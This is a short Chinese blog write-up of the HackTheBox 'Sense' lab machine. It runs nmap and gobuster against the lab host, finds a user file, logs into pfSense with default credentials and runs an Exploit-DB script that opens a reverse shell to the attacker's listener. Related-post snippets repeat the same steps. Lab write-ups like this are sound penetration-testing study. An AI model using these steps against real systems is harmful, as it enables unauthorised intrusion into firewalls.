HackTheBox::Sense

最新推荐文章于 2024-09-14 16:43:29 发布
最新推荐文章于 2024-09-14 16:43:29 发布
阅读量182 收藏
点赞数
分类专栏: Hack The Box 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/127261601
版权

0x00 信息收集

nmap -Pn -sV -T 4 10.10.10.60

查看80和443端口的服务

尝试常用弱口令登录以及lighttpd版本的漏洞失败,使用gobuster爆破路径
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -l -t 100 -k -u https://10.10.10.60 //-l 显示相应长度;-k 跳过ssl证书验证;
得到路径/system-users.txt,得到账号名为rohit

使用google搜索sense default crendital,会默认关联pfsense default crendital。得到默认账号admin,默认密码pfsense

成功进入后台,得到当前软件使用的版本为

在exploitdb中找到相关漏洞

0x01 漏洞利用

python3 exp.py --rhost 10.10.10.60 --lhost 10.10.14.3 --lport 4444 --username rohit --password pfsense

aya3t
关注
专栏目录
hackthebox-sense(考点:信息搜集/pfsense安全
冬萍子癸水
04-12 464
nmap 80和443都是网页端口 打开,进入 是一个登录框。pfsense,防火墙&路由器管理软件。这多半是个pfsense安全漏洞的考点 继续信息搜集 dirbuster扫。后缀加多一些比如txt,不要只光扫php文件。可能有robots或类似的txt记录有价值的信息。 找到了登录信息文件 这里密码可不是company defaults ,是pfsense公司默认的登录密码。 还...
HackTheBox-sense渗透测试
weixin_43111940的博客
04-22 223
sudo nmap -sC -sV -A -p 80,443 10.10.10.60 gobuster dir -u http://10.10.10.60 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x 'html,php,asp,aspx,zip,rar' 访问页面,找到了cms,但是没有版本号 扫描到了system-users.txt 密码是默认,可能是靶机名,可能是cms的名字,尝试后发现是pfsens
Hack the box靶机 Sense
菜浪马废的博客
05-20 314
合计找一下lighttpd的漏洞 因为之前在vulnhub做过一个lighttpd的 但是没有能利用的 扫一下目录 我是真要吐了 我吐了!!!!!! 吐了!!!!!!!!! 这扫描也太慢了 40分钟还没扫描完!!!!!! 有没有大佬指导一下我 让我爆破目录更快!!!! 奉上双膝那种感谢!!!!!!! 化身盗图狂魔了我要 不扫描了 给了用户名rohit 说是默认密码 goole一下 rohit:pfsense 登录 用43560.py 运行要用python3 不然不能运行 看着自己做这么多了 .
Hack The Box】linux练习-- Sense
人间体佐菲的博客
11-09 414
Hack The Box】linux练习-- Sense
No.119-HackTheBox-Linux-Sense-Walkthrough渗透学习
qq_34801745的博客
05-28 235
** HackTheBox-Linux-Sense-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/111 靶机难度:初级(2.8/10) 靶机发布日期:2017年10月22日 靶机描述: Sense, while not requiring many steps to complete, can be challenging for some as the proof of concept exploit that i
HackTheBox-Machines--Sense
七天
05-31 457
Popcorn 测试过程。
实战HackTheBox里的Haystack(文章末尾有两个微信小程序抽奖活动~~)
知柯信安
12-25 851
第一步,在主机上运行Nmap扫描以发现正在运行的服务: root@kali:~/Documents/haystack# nmap -A -oN scan 10.10.10.115 Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-14 17:23 UTC Nmap scan report for 10.10.10.115 Host is up (0.017s latency). Not shown: 997 filtered ports PORT
一无所知学编程:Jargon File(1)
weixin_45981643的博客
05-05 1105
英语百科 The Jargon File is a glossary and usage dictionary of computer programmer slang. The original Jargon File was a collection of terms from technical cultures such as the MIT AI Lab, the Stanford A...
电影:钢铁侠3
m0_61149488的博客
06-24 6207
漫威的“钢铁侠 3”让傲慢但才华横溢的实业家托尼·斯塔克/钢铁侠与一个无止境的敌人对抗。当斯塔克发现他的个人世界被敌人摧毁时,他开始了寻找责任人的艰巨任务。这段旅程,在每一个转折点,都将考验他的勇气。斯塔克背靠墙,靠自己的装置生存,依靠他的聪明才智和直觉来保护最亲近的人。当他反击回来时,斯塔克发现了这个秘密困扰他的问题的答案:是自身成就了战甲,还是战甲成就了自身。 ......
c# midi窗体_Midi:C#中的Windows MIDI库
cunhan4654的博客
08-25 1896
c# midi窗体Download MidiSlicer-master - 268.6KB 下载MidiSlicer-master-268.6 KB Download latest from GitHub 从GitHub下载最新版本 介绍 (Introduction) I do some MIDI sequencing and recording and I found it helpfu...
Chrome的启动参数
Criss@陈磊
02-23 4725
List of Chromium Command Line Switches Condition Explanation --[1]⊗ Classic, non-material, mode for the |kTopChromeMD| switch.↪ --0⊗ Value of the --profiler-timing flag that will disable timin...
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 874
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 1030
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
伙房食堂电气安全新挑战:油烟潮湿环境下,如何筑起电气火灾“防火墙”?
acrel002的博客
09-12 391
安科瑞的智能安全配电装置打破了传统用电防护领域中仅仅只能做到“事后处理”的技术瓶颈,提前将配电转换安全电,从源头抑制电弧火花的产生,大大降低火灾风险,同时系统实时监测电气线路中电压、电流、功率、温度、剩余(漏)电流、对地绝缘阻值等关键数据,智能识别电路异常风险,及时将报警信息传送至云管理系统,提醒用户单位及时进行故障排查。近几年,随着我国经济的飞速发展,食堂餐饮也经历了一场变革,越来越多的电器走进了伙房食堂中,实现了电气化,为人们提供了高效便利的饮食服务,但同时也增加了火灾负荷。
消防指挥中心控制台:守护安全的关键枢纽
JiaDeLi_console的博客
09-11 372
它不仅是信息的接收者,更是行动的发起者,协调各方资源,确保消防救援工作高效、有序地进行。消防指挥中心控制台是消防救援工作的关键环节,它以先进的设计、强大的功能和不断升级的科技,为守护人民生命财产安全发挥着不可替代的作用。在未来,随着科技的进一步发展,相信消防指挥中心控制台将变得更加智能、高效,为构建更加安全的社会环境贡献更大的力量。同时,控制台还配备了舒适的座椅,为指挥人员提供良好的工作条件。在消防应急救援的战场上,嘉德立消防指挥中心控制台犹如一座坚实的堡垒,发挥着至关重要的作用。二、先进的设计与功能。
3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)
weixin_52173250的博客
09-07 1621
HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务器之间安全地传输数据
企业如何构建有效的数据泄露防护安全体系
最新发布
A526847的博客
09-14 420
在当今数字化时代,企业数据已成为核心资产,其安全性直接关系到企业的竞争力、客户信任度以及法律合规性。数据泄露事件频发,不仅会导致经济损失,还可能损害企业声誉和客户关系。因此,构建有效的数据泄露防护安全体系已成为企业不可或缺的重要任务。
构建常态化安全防线:XDR的态势感知与自动化响应机制
安胜ANSCEN的博客
09-11 952
一款基于XDR理念的一站式安全运营平台,由长年实战对抗中形成的攻防知识经验指导设计,结合大数据、大模型与安全编排自动化响应技术,提供全局监测预警、自动化研判、智能响应、联防联控等能力,体系化提升全局态势感知和主动防御能力,规范化安全运营协同管理工作。星盾作为企业网络安全体系的安全大脑通过汇聚传统安全设备的数据,形成覆盖云、网、边、端全维度的神经元体系,实现跨边界、跨区域、跨设备的全方位安全检测和响应,为全局的安全态势感知、风险评估、资产台账管理、上下联动与协同等安全运营工作提供一站式解决方案。
语义基础:Sense与Reference
例如,'Norman talked to her in the bedroom.' 这句话在不同的上下文中,'her'的Reference可能会变化,可能是Norman的妈妈,也可能是Norman的女朋友,这取决于具体的语境。 此外,语用学(Pragmatics)考虑的是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值